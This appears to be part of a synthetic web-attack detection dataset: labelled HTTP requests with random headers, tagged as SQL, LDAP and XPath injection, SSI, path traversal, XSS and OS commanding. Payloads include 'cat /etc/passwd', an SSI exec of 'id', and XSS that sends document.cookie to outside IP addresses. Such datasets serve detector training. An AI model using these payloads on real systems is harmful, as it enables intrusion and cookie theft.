~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39688
Start - Id: 42168
class: SqlInjection
GET /eK3Fj@GAg/3imjBf/47.3A@insertV7/1l9oGn0aEhzo8a/enooztmtsrott8t/t9C5ALXFC9/i822Yc9WE/7nEi5etbnenyi/m5YsmWW/yUIQgrsxwl.asmx?rcsR4rt=Fis%26sstyle%2BhT+a6scriptr&rehinie6vE=%40%7E%40detUs&bRag=i8&d6do4=%3F+%5Bp+14n%24lpvr+&eyotitves=0ufsd+tei%2Be+&yumyfn29=r.bXOjA&ie1ome5Ocj=z%25u%3Fh%5Da&BXe0n=eeaqss1armwyenai&di8al7htErii5o=OR+++%27Axt%27++++BETWEEN+++%27R%27+AND++++%27T%27 HTTP/1.0
Host: 253.197.84.83
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 61.45.209.154
Cookie: tg0za=5229;feheel1cb=tf1nGRFQ;hoaGo= ql |oad'niblhi7bgsoundt
Cookie2: $Version="82"
Date: Thu, 09 Jul 09 16:31:20 GMT
ETag: "rmoKgaJRhzxXhz04d"
Expect: ans0pett
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 21 Apr 08 09:51:44 GMT
If-Unmodified-Since: Mon, 23 Jun 08 07:34:32 UTC
If-Match: "yZjPYsdxkZX2ETBc"
If-None-Match: *
If-Range: Wed, 23 Mar 05 22:21:25 GMT
Max-Forwards: 49
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic aWVuejQ6NmluSWls
Range: -65233,-6365
Referer: /fercooi/Eiew/4rmlbl/eoivtbTm/rnncjaa.ace
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/7.6 (compatible; a4eseexl; Windows NT; mrhhitc0oy)
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/9.3 114.145.212.175, 7.9 153.253.174.161:86
Transfer-Encoding: deflate
Upgrade: nredd/1.9, kMnu/6.6, iarn/4.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42168
Start - Id: 39622
class: SSI
GET /Zwe-dv8MS7kscripthG/4knb4/.sstdinW9inSlW/eez2ekg/a7w/jsy/yFxd/lib7QTalle/1.FdivOf-L04/aldI/nruaeesTy.tiff?xCoD@homeq5=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E&umtnthealse=759 HTTP/1.1
Host: 235.157.122.227
Connection: close
Accept: text/xml;q=0.0, image/gif;q=0.8, audio/basic
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: Er-bnjCdsto, nnas-rs, inLsocx-naeelc;q=0.5, t-auoedosh
Cache-Control: no-store
Client-ip: 79.170.36.207
Cookie: Tdnormrd2a=qtfx;hntm2=|=o;tEu=jnysteaeSf7irci;iasslombslaosb=se'Z6nty;ain7rWoh=41680
Cookie2: $Version="78"
Date: Fri, 14 Jan 05 09:43:53 GMT
ETag: "JNM4muUx1V.zdKmp.HOl"
Expect: fTEanr
From: nneTpp@ds2o4khd.org
If-Modified-Since: Sat, 10 Nov 07 21:06:16 CET
If-Unmodified-Since: Wed, 06 Aug 08 05:59:41 UTC
If-Match: *
If-None-Match: "7_B9IoI8RT._5O8IHd3"
If-Range: Mon, 01 Aug 05 13:12:10 CET
Max-Forwards: 72
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: t7Ca dthiOsnp=enpbG
Authorization: Digest cnonce="qt0mmu"
Range: 973-,-4,32221-
Referer: http://www.esru.gov/BimmSr/e0rohezb/ftq8xn/rcrhhtts.gz
TE: deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.4 (Windows; U; WinNT 6.4; re-tt; rv:3.9.9) Gecko/07669510
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 7.3 80.176.58.194
Transfer-Encoding: oraN
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 661984692472
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39622
Start - Id: 36147
class: PathTransversal
GET /xB.DPxeTY/yoTvn6e0MSS/etsdbtaUhuq9lywDsot/thltp6t/ptn12i.aspx?cdpLgrkh7or6ahd=a17b&eom2ea0i=4%3A%5Cautoexec.bat&eeom=tbe&rbcPchldih=tRxy-8AdD-&DQoKk.cu=2466&asa9sp=OuaVt&a9mgrirleisnc9=emo&5tese3ss=oet HTTP/1.0
Host: 0.20.98.80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.1, x-mac-korean;q=0.2, gb2312;q=0.1
Accept-Encoding: 
Accept-Language: nrd-e7tniacm;q=0.5, fhtlnrd-lez8eBhg
Cache-Control: max-stale
Client-ip: 52.138.136.254
Cookie: rqosnhho3d0me=etl;hiTqmalnt=e5so;rmandd=\'lefnisyn;ioS52lbtr=1;uqWdn=fAlnde4hfoasln0;link-7kCeall=sR3zedoiTTad9
Cookie2: $Version="90"
Date: Wed, 02 May 07 09:26:57 GMT
ETag: W/"ns9fmDOQwg1@j3lH"
Expect: 100-continue
From: aitunw@tegatgpn.uk
If-Modified-Since: Sat, 04 Jul 09 12:04:57 CET
If-Unmodified-Since: Sat, 02 Jun 07 10:22:17 UTC
If-Match: "Qod20fW@kC2YZiIll"
If-None-Match: "K43o6XIECWMNYSC"
If-Range: Fri, 26 Oct 07 21:16:20 UTC
Max-Forwards: 27
MIME-Version: 8.8
Pragma: Eohs=trob
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM U0huczFvcmg3WG5pYXc1ZWladGdua2F6b1RpZGJudG8=
Range: -448630,420-,09-
Referer: http://3aib5dye.be/prfhih/a0umH/bemSe/As8eaho.aspx
TE: trailers,trailers
Trailer: Connection
User-Agent: lA4MjCxNR8 http://www.jiomhen.biz
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 795x647
Via: FTP/9.8 116.51.161.190, 2.5 www.nVyts.jpg:2502, 9.8 www.6rrnh.css
Transfer-Encoding: gzip
Upgrade: bhte/9.7, rertro/9.5
Warning: 851 141.46.27.130 "hnaniEfhYuniiebi" 
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36147
Start - Id: 45590
class: PathTransversal
GET /red7UiRel/Z0IV62include/2nraid2tre74pLesxiea/usneezr8dmic4woS0R/-4mailviframee/ePMnrI0HNIHFk4k_3/lqq8DQhG.css?7eliaotjxnj=tmpq7&oeaedrnto=7faw&Ohpeidhetoc=rysnnieiu0rRn8nK&j3odcp9tmkleira=tnorlqz2dlcvx&Tteenserut=87&yikwe=%40tnsT&BdiomTW=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&nnyolisdcwr=Cae627hN&qwNoedueib=7265&eTcOEK@=57706&eCo8=60718426 HTTP/1.1
Host: www.Erinke.fr
Connection: close
Accept: image/png;q=0.9, text/xml
Accept-Charset: cp-950, iso-8859-2, koi8
Accept-Encoding: 
Accept-Language: itI-nhj
Cache-Control: only-if-cached
Client-ip: 133.101.53.197
Cookie: W0tMtmpdaFwnodeL5=6275;1ycywEt4t=tf;unOirezo1et8u=hanW1n?ue;OI3QRlinkl1AJI=ds83dna;slz3ovpC_nq=ea;htkOeSewKitz9a=llZtaCnlns8
Cookie2: $Version="513"
Date: Wed, 02 Apr 08 15:14:53 CET
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: we9ro
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Mon, 25 Aug 08 12:09:23 CET
If-Unmodified-Since: Sun, 11 Apr 10 05:48:17 GMT
If-Match: "q4t7QLLup-X_Lvm"
If-None-Match: "X-XLVTUX_OJnh1DU"
If-Range: Wed, 26 Aug 09 16:36:37 GMT
Max-Forwards: 735
MIME-Version: 8.1
Pragma: eedti=wftdA
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: -3163,-605229
Referer: /3rymx4oT.fgf
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: rcxBzW. http://www.7hwerts.com
UA-CPU: StrongARM
UA-Disp: 911,8166,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5892x3688
Via: aZrs/9.5 www.eIljbssu.css, FTP/2.3 94.160.84.51:7660
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 125.18.205.103
X-Serial-Number: 59418897885671508932
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45590
Start - Id: 47326
class: XSS
GET /bZZbinNZWprocessing-instructiongu/6t/90/seken5ceeamMjeeeIIet/JK0CHGSKj8Faopen/pu/KwFLR.mdb?xjdiv4x=%3Cimg+++dynsrc++++%3D++++%22javascript%3A%5Balert+%28%27Uimt%27%29%3B%5D++++%22++++%3E HTTP/1.1
Host: www.NnwwjSt.gov:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: shift_jis, windows-874;q=0.8, x-mac-hebrew, isiri-3342
Accept-Encoding: compress;q=0.6
Accept-Language: c-i;q=0.3
Cache-Control: no-transform
Client-ip: 68.164.101.129
Cookie: aai=558755;sdtieerm0tzhofe=tryhomes;eeohthckoWase=? h5;tygk8=neosaOiGnenehqn;irS=4;0wthoaeiln=pauvsddo
Cookie2: $Version="4"
Date: Mon, 08 May 06 09:00:13 CET
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: ueasrS@d1jogree.it
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: *
If-None-Match: "BR9EA9UBUs2zLfnOE"
If-Range: *
Max-Forwards: 412
MIME-Version: 3.5
Pragma: zxretWla=8ltlbTeg
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic NmJob1dyOnZlZXN0
Range: -827060,69-,229-399617
Referer: /lwep1smu/bnne/eawsbmlq/fnt2et.cgi
TE: trailers,chunked;q=0.6,trailers
Trailer: If-Match
User-Agent: hVwa7Y2 http://www.dz7rs.net
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6004x311
Via: FTP/0.4 243.52.213.208, ewo/8.5 www.aosetyt.html
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 254.218.8.107
X-Serial-Number: 126620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47326
Start - Id: 42248
class: SqlInjection
GET /lRT0jbaDVhtmD3JD/loellustsicEds/hjIBM/ienb/XBbJV5EesSttP6O/etuw/tbyZG6Z@tJ/i2treahsv9ry3del4iep.exe?cecdIoj8pVtenS=m%3EraH7toIorie%28sne&NbVsye=niYdSL6GH&i7sof=0&qtkvige=rf&-QLOJNCGsystemC=vyobgaX%24lrTEzox&qdaro3=znzD001YU&ehlitZfaesnrha=gz&b55lxrNtgoh=936284&onoSvm=chairs%27+UNION+++++SELECT++++maaE2e++FROM+dba_users+++WHERE+name+++like++++%27%2525&xlti=589007&6@052okSz=216362&htea6M1qe=mNbEWF HTTP/1.0
Host: 19.106.140.255:80
Connection: keep-alive
Accept: text/html;q=0.3, audio/*;q=0.9, text/html
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.4, gzip, compress;q=0.7
Accept-Language: *;q=0.5
Cache-Control: lutsasd='hKteee'
Client-ip: 83.53.205.169
Cookie: msrwjR7rni=2064;aonselr=98698
Cookie2: $Version="201"
Date: Thu, 26 Apr 07 13:06:04 CET
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: ppnuhf@cKraaqblss.ch
If-Modified-Since: Sat, 17 May 08 16:55:56 GMT
If-Unmodified-Since: Tue, 14 Jul 09 08:21:23 CET
If-Match: "pnplux.2entWA86i"
If-None-Match: *
If-Range: Sun, 18 Oct 09 07:30:12 CET
Max-Forwards: 3
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZWxoZWF1aWl0MW5ldE0wZHcxd3FzeWxhc25udmZ3dXlzcGllcjVyd3NsdWhueXN4
Range: 4539-14148,-19,934-
Referer: /eeFo/wtivlpq9/sanne/eaepe/dta4zn.aspx
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/4.8 (compatible; xart9uww; Mac OS X; io8w; nagRpEf; envojihonT)
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: HTTP/1.9 25.245.83.106
Transfer-Encoding: gzip
Upgrade: 4y6f4s/5.0, zamnyn/1.6, 2ax/0.7, eud/3.4, ihha/3.6
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42248
Start - Id: 40218
class: SSI
PUT /itSnitmndhtozeh/ngfeemdiseBaat1raScm/teyyj.sh? HTTP/1.1
Content-Length: 35
Content-Language: dtunt9g
Content-Encoding: deflate
Content-Location: http://ctoPrcdp.cz/1eagines/huea.conf
Content-MD5: ZXRzc25hbkdzdWNoZWt0TQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 09 Jan 10 11:28:02 GMT
Host: www.2isjeOe8.gov
Connection: nno7Xa
Accept: video/quicktime, image/*;q=0.2, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: BTo-e8way7;q=0.5, nrfecoAi-Oa3;q=0.3, 8fegjset-i
Cache-Control: no-cache
Cookie: UDANX6u3passthruZs=/naYw(ohext;in6lNsvuafmege9=<! #<!--     #exec cmd="id"-->;UtHpxp_2VW4=7;eheluaAabt3lua=ratfmnxqrhniue46t;ngrf2rmhc=t>f3iframe$wln
Cookie2: $Version="8"
Date: Thu, 03 Jun 04 22:25:50 UTC
Expect: 100-continue
If-None-Match: *
If-Range: Mon, 05 Dec 05 09:22:39 GMT
Max-Forwards: 1
Referer: http://tenooc.cz/b8nyiaii/tatsdyI/du7wh/boEs3eo.asp
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 9.6; qj-be; rv:0.5.0) Gecko/70664615
Via: 0.3 www.4rGn.gif
Transfer-Encoding: ne2sWl; rdd0r=ersyo
----: ----------------------------

s04iEtRhrae=bs  &eaTutiA=eaaoyrerRo

End - Id: 40218
Start - Id: 46639
class: XSS
GET /gwSdopiHsctp/eqehriL/uIX-KXydH/Jcopy-styleZ40VorVyid3C.jpg?0dXfS78q=sUedegfUtmpi&ymnnna=rKYqRpbck_6&eec6CU0Vaselect=oEyoi&nul=trs&ashToTmce=8ih0%3A&oettucEUh8w=2126256057&flnqa=h HTTP/1.1
Host: 231.8.244.220
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.6, compress, compress, identity;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 173.63.25.136
Cookie: h9Rh=eeqc;mjloliaTi4em=75298770;-5QOsT4xj=9;ln8nltnclMrtdnx=6a
Cookie2: $Version="89"
Date: Sun, 23 Sep 07 15:49:34 UTC
ETag: W/"EH3TK2WBSeCrrP1S"
Expect: reChrjl
From: iuaea@cvOyle.it
If-Modified-Since: Sun, 07 Mar 10 08:33:50 CET
If-Unmodified-Since: Mon, 23 Jun 08 18:34:07 UTC
If-Match: *
If-None-Match: "0..u63tC0-2OEfl"
If-Range: *
Max-Forwards: 32
MIME-Version: 7.9
Pragma: noNokth=t8
Proxy-Authorization: Basic YW9kdFRlZTpjY2Vs
Authorization: Digest qop=auth
Range: 118-482,-132
Referer: /qbAat/6erhJs/TscwTns/oeeaErqy/raadhiQ.exe
TE: trailers,trailers,deflate;q=0.2
Trailer: Via
User-Agent: <div   style ="     background-image:   url(javascript: [window.open('http://2.172.211.141/nere.php'+document.cookie);]);    "    >
UA-CPU: PowerPC
UA-Pixels: 4819x5235
Via: 4.5 www.aibs.js, 4.4 www.xiysicoe.tiff
Transfer-Encoding: deflate
Upgrade: Ecza/9.5
Warning: 928 www.Hrjmm.html:2 "ioeeieocmeSemhfete" 
X-Serial-Number: 4075489
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46639
Start - Id: 37526
class: LdapInjection
POST /2tG1d@86.b/eftye/fG@8OKCl7Tocaa/pEArLVOZXVO1/4a/rneuao80eamatmmjt2De/Tcb8Oytloitrhaa.cfm? HTTP/1.1
Content-Length: 222
Content-Language: q2ceuS,eeEu,AlhnEecd
Content-Encoding: compress
Content-Location: http://yaatmOt.it/afte/rygs7tR/Phnceya/ooeocph.jsp
Content-MD5: bjFycTJzaWFtOGRsdWRucg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Nov 08 20:58:54 CET
Last-Modified: Tue, 07 Jun 05 15:21:26 GMT
Host: www.0udis.com
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 106.155.251.0
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Sun, 24 May 09 05:56:01 GMT
ETag: "eRBcLEPpUSsRmtpuW-pP"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 17 Jan 08 11:22:36 CET
If-Unmodified-Since: Sun, 03 Aug 08 11:02:24 GMT
If-Match: *
If-None-Match: "MDJUNpwO41Fggpt"
If-Range: Sun, 30 Mar 08 06:28:04 GMT
Max-Forwards: 2188
MIME-Version: 3.0
Pragma: tN=oOupae
Proxy-Authorization: NTLM bmFsZnRybWs1VG1ybmVlTGh3Z2l3dDVGZDFubnNib0EwOWl3bTRoUnZOMm53aW9p
Authorization: 0asc eGcueeu=UjMt4nt
Range: 0516-7855,069180-,334-
Referer: http://dsoonH.uk/aeka/r7oSg/o68dks.jpeg
TE: trailers
Trailer: Expect
User-Agent: eyeom (yPrcF7KIFv; u0pcXN1; orS7kJq9o; nBvCGc)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: FTP/0.4 151.217.248.46
Transfer-Encoding: identity
Upgrade: 6ciYs/4.5, tUt/0.1, hmo/8.6, HPozai/2.7, 4rIvIy/9.5
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

js6uhsanrolhe=")(targetfilter=(o=NetscapeRoot))&H2e=srzD&ntEXu9umetl=07&xleAtOkru=62060&OoKY=k@MvFs&Ydx7eeEn9aype=t3&ti0Re=bgsound o&N0execpMqAHG-Ch=208295932&1SrerpyQeo= &aidttUxRt=cNshciironenp4b&38=274

End - Id: 37526
Start - Id: 47464
class: XSS
GET /jTO5UtcG2zxX3BX3/otajeqctsabfgciht/beO/oMHO0n/g7cDC1Yw-AX/tzLA7FKSKKua8d/ncjJWyomW0uVz8n/midJ.5sRpP/fndHhrr2nnenna4te1.pl?WAlQCUCrjx=t&bsQXBJo=%3Cimg++++src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F67.149.153.240%2Fsi.exe%27%2Bdocument.cookie%29%3B%5D%7D%3B++%3E&0iZroa=hetH72roll5to&oms=group+bytwtenwzingbody1ia HTTP/1.0
Host: 72.192.58.253
Connection: 7spg
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 146.143.28.253
Cookie: hlceiHdePz=519;ntdlyesthIpi=bftLsY9;eeAnico=11;stoanepeammsnd=;n7tdropmteh;i42i0ojTso=i\;ceAtaynlhtaehp=ehtgroup byeLh
Cookie2: $Version="305"
Date: Thu, 27 Jan 05 12:37:12 GMT
ETag: W/"uzI9bL.HvonYqbj"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Tue, 21 Jun 05 01:44:56 UTC
If-Unmodified-Since: Fri, 29 Sep 06 12:24:47 CET
If-Match: "dsqezla3Zlk5Dna"
If-None-Match: *
If-Range: Wed, 07 May 08 07:22:11 UTC
Max-Forwards: 9988
MIME-Version: 8.7
Pragma: iiu=rioxn
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest cnonce="rfhe"
Range: -8,89-
Referer: /whhy.pdf
TE: trailers,trailers,chunked
Trailer: From
User-Agent: Mozilla/9.6 (Windows; U; Windows NT 2.4; nl-na; rv:0.9.4) Gecko/15455116
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4671x382
Via: 9.5 214.176.0.28:6399, FTP/5.2 www.nsej.png:9, zaeuRq/9.2 www.pybkrou.htm
Transfer-Encoding: e80e; j47rt3ts=hbk2t
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47464
Start - Id: 48624
class: XPathInjection
POST /7nfM4M3Y/m5df4l.47lY39vomWz9/e@DOTt_/spesls1lyE/cK/be6xcvonhe.dll? HTTP/1.0
Content-Length: 158
Content-Language: 3sTg1,teeahash,o
Content-Encoding: identity
Content-Location: http://kw5dcej.gov/eiOiEp/cnppxait/wojin/uDMae/akcts.rar
Content-MD5: NjZoZ29uRG5lREVhSGl6ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Dec 08 03:31:03 UTC
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: www.arHSS.de:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-2, iso-2022-kr;q=0.5, cp-932, macintosh;q=0.9, x-mac-arabic
Accept-Encoding: 
Accept-Language: tuvJe0e0-eBs3Eqt;q=0.1
Cache-Control: max-stale=69394
Client-ip: 68.45.171.152
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="9"
Date: Sat, 05 Jul 08 02:56:35 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: rcneifm=nmthhk;6exTej01=esgtdhS2
From: wsnewerh@atausf.it
If-Modified-Since: Sat, 06 Feb 10 10:54:15 CET
If-Unmodified-Since: Thu, 05 Jun 08 20:13:58 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Oct 06 12:48:14 UTC
Max-Forwards: 752
MIME-Version: 7.4
Pragma: d=teqSaaes
Proxy-Authorization: NTLM eW5FcXBhcmVnbWJ1cjJhdWFlRTBsbjg1b25ld2N0bmxPVWg=
Authorization: etd1t rnmaes4t=eSeEh
Range: 939-64,563448-00397,65796-
Referer: http://aoee.it/oirea/eetae.dll
TE: deflate;q=0.2
Trailer: Referer
User-Agent: taMjhesbrdIi
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: ossh3
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

7o8dBtgpsSja=6251&snEnwviwy7=qssMpo3irAhbepti&qKiendpUte0aul=o9sboi/E/aew9/child::node()[position()=750]    or  'eape'   =   '

End - Id: 48624
Start - Id: 38961
class: LdapInjection
GET /aF4R/ltPg/6F/k3WLNZa_2VPA87R/b1sy2hr/evjaQmF2l.K1RU/sS0wyz/o7YeulfougAziRt2ne/VIfzLd.php?lal=y++tD&jeaontwto=7815417597&oxaja=hbinivrm9s%5CyoEblikesh+cmd&lyyttuiaestu=passthrusyrLn&aOlaehs=%29+++%28++%7C+++%28seene%3Deqrnj*%29&lreplacexmlktU_pS1w=iNH4X&kHV9sP1G_=iN8.sK1spio&tvoadolnr02rMji=andueem&lsaxst=q.M4 HTTP/1.1
Host: 106.228.192.30
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, cp-936;q=0.8, cp-936;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: le=e9haS
Client-ip: 65.168.89.85
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="4"
Date: Thu, 05 Oct 06 18:37:56 GMT
ETag: W/"CWyyv9@t_OHQUFO"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 20 Aug 07 21:14:07 CET
If-Unmodified-Since: Sat, 01 Dec 07 04:42:30 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 082
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Basic Z2k4dDppc2Rzc2ZO
Range: -764,-7
Referer: http://www.oeieL.it/Edvntth/IgasE.zip
TE: deflate;q=0.2
Trailer: If-Match
User-Agent: hms2h1he (t@fGEDJAj4; sxnUzW8hti; v2hW7Z)
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0621x5666
Via: 3.6 117.87.47.243:737, FTP/1.7 www.koafe.css:7, 6.4 www.itrnone.js
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38961
Start - Id: 43211
class: OsCommanding
GET /m-FN5rnab/rNEdMVrvXTt_zUjXu.html?nyo2Abiee=%250a+++++cat++%250a%2Fetc%2Fpasswd+%250a&etcZtmpoDxbr=mf&.BFyuuVa=scriptmvaG9p&nEeo9dnniu6lnjh=yeeb+hf&iUnhnmr5sseg=hnamgldEnicx&5lvIf=lO&qli6sxt=%3Cgs%7Eqalls3null%7Eo4&essniolldh1f=e7Zreoc HTTP/1.1
Host: 237.4.164.56
Connection: keep-alive
Accept: video/quicktime, text/*;q=0.7, video/quicktime;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.2
Accept-Language: lSa-rdet;q=0.9, U2rcoae-Aynre;q=0.3, tnshroy-hn;q=0.2
Cache-Control: max-stale=1931
Client-ip: 59.228.253.1
Cookie: Ins=7
Cookie2: $Version="350"
Date: Sat, 16 May 09 12:44:43 GMT
ETag: W/"oGyzD5bjuhHnWjG"
Expect: 100-continue
From: dce3hsp@34tobzetrq.fr
If-Modified-Since: Sat, 11 Mar 06 07:09:55 UTC
If-Unmodified-Since: Sat, 09 Jul 05 12:08:03 GMT
If-Match: "_Izm4xKtl.Xnnh24E5mY"
If-None-Match: *
If-Range: Wed, 18 Jan 06 20:47:38 CET
Max-Forwards: 18
MIME-Version: 7.7
Pragma: ta=bd
Proxy-Authorization: mfey smnSW=fltvk
Authorization: Digest nonce
Range: 2403-,12114-9,53-40810
Referer: http://www.eytb3.gov/SZtneaic.txt
TE: deflate;q=0.9,gzip,trailers
Trailer: User-Agent
User-Agent: iihaehhcesydlph
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 953x846
Via: 2.9 www.mrk97j.htm, HTTP/8.3 www.nOlsee.tiff, FTP/7.4 108.131.105.234
Transfer-Encoding: lauvse; eychmig=l1athgp
Upgrade: cieon/9.6, fEu/4.3, uUa/0.7, eme/1.4, aopoq/1.0
Warning: 067 www.whHhen8.tiff:01 "nyi9rr1Caal" 
X-Forwarded-For: 36.57.46.253
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43211
Start - Id: 48323
class: XPathInjection
